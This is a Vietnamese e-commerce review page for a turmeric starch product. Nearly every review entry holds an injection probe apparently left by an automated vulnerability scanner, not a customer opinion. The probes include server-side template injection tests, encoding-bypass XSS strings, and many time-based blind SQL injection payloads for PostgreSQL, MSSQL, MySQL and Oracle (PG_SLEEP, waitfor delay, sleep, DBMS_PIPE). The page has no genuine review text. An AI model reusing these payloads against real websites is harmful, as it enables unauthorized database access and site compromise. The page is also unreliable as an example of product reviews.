Đánh giá sản phẩm cho Tinh bột nghệ

  • chỉ có thành viên mới được trả lời

Viết bình luận

* Các yếu tố đầu vào có dấu hoa thị là bắt buộc và phải được điền vào.

Đánh giá hiện tại (1793)

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx9555%C0%BEz1%C0%BCz2a%90bcxhjl9555

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx4261%C0%BEz1%C0%BCz2a%90bcxhjl4261

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx6106%C0%BEz1%C0%BCz2a%90bcxhjl6106

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg9208<s1﹥s2ʺs3ʹhjl9208

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg1255<s1﹥s2ʺs3ʹhjl1255

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg5951<s1﹥s2ʺs3ʹhjl5951

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx3775%C0%BEz1%C0%BCz2a%90bcxhjl3775

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

9514379

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx2667%C0%BEz1%C0%BCz2a%90bcxhjl2667

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx10624%C0%BEz1%C0%BCz2a%90bcxhjl10624

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx8634%C0%BEz1%C0%BCz2a%90bcxhjl8634

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

9591716

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg9025<s1﹥s2ʺs3ʹhjl9025

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

9528584

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg1727<s1﹥s2ʺs3ʹhjl1727

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg4366<s1﹥s2ʺs3ʹhjl4366

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg8426<s1﹥s2ʺs3ʹhjl8426

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

9287588

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

9701989

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

9135089

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

9648256

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx6960%C0%BEz1%C0%BCz2a%90bcxhjl6960

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg5244%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5244

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx9603%C0%BEz1%C0%BCz2a%90bcxhjl9603

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx5182%C0%BEz1%C0%BCz2a%90bcxhjl5182

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg6297%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6297

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg5598%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5598

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

19088354

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

19804836

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

19982751

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

@@VhhbO

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1����%2527%2522

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

cbxrEib6')) OR 353=(SELECT 353 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

iJd4peIV') OR 28=(SELECT 28 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

qjHHCIZm' OR 583=(SELECT 583 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1)) OR 875=(SELECT 875 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5) OR 90=(SELECT 90 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5 OR 713=(SELECT 713 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

k1KhxzVY')); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

klG2ykjb'); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

QI6WEONb'; waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1 waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1)); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1; waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

if(now()=sysdate(),sleep(15),0)

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1" OR 2+313-313-1=0+0+0+1 --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1' OR 2+613-613-1=0+0+0+1 or 'pfPXgdgx'='

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1' OR 2+321-321-1=0+0+0+1 --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1 OR 2+413-413-1=0+0+0+1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1 OR 2+240-240-1=0+0+0+1 --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

@@hna8e

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

1'"

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Ej6nhDmv')) OR 887=(SELECT 887 FROM PG_SLEEP(15))--

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

JMb9yfFD') OR 923=(SELECT 923 FROM PG_SLEEP(15))--

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

JQm4RyLo' OR 19=(SELECT 19 FROM PG_SLEEP(15))--

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

7XrcOhdn')); waitfor delay '0:0:15' --

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

rfkt5FPC'); waitfor delay '0:0:15' --

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

ERCMdFW9'; waitfor delay '0:0:15' --

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

1 waitfor delay '0:0:15' --

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

@@6h0aj

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1����%2527%2522

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Nhận xét này có hữu ích không? 0 0

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Nhận xét này có hữu ích không? 0 0

if(now()=sysdate(),sleep(15),0)

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

CJSgSKHp')) OR 844=(SELECT 844 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

-1" OR 2+471-471-1=0+0+0+1 --

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

-1' OR 2+651-651-1=0+0+0+1 or 'hH4NRhTg'='

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

-1' OR 2+881-881-1=0+0+0+1 --

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

-1 OR 2+403-403-1=0+0+0+1

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

-1 OR 2+153-153-1=0+0+0+1 --

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

zxzuOYAH') OR 379=(SELECT 379 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

eGcQyaEz' OR 428=(SELECT 428 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

@@SN3Zw

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1)) OR 569=(SELECT 569 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

sfwmKsk4')) OR 598=(SELECT 598 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5) OR 615=(SELECT 615 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

rDQFwq6k') OR 40=(SELECT 40 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5 OR 763=(SELECT 763 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

YjKB0flH' OR 758=(SELECT 758 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

LjrmCl4T')); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

TIRV5XGW')); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

0roThHAT'); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bBnhkzY2'); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

gZSDNJAS'; waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

@@DuIcW

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1����%2527%2522

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

SdMSIwMR'; waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1 waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1 waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1)); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

zKWsSZGX')) OR 458=(SELECT 458 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bVqKf1LB') OR 786=(SELECT 786 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1; waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

HU2qH7Jc' OR 239=(SELECT 239 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

@@DLMuZ

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1����%2527%2522

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"

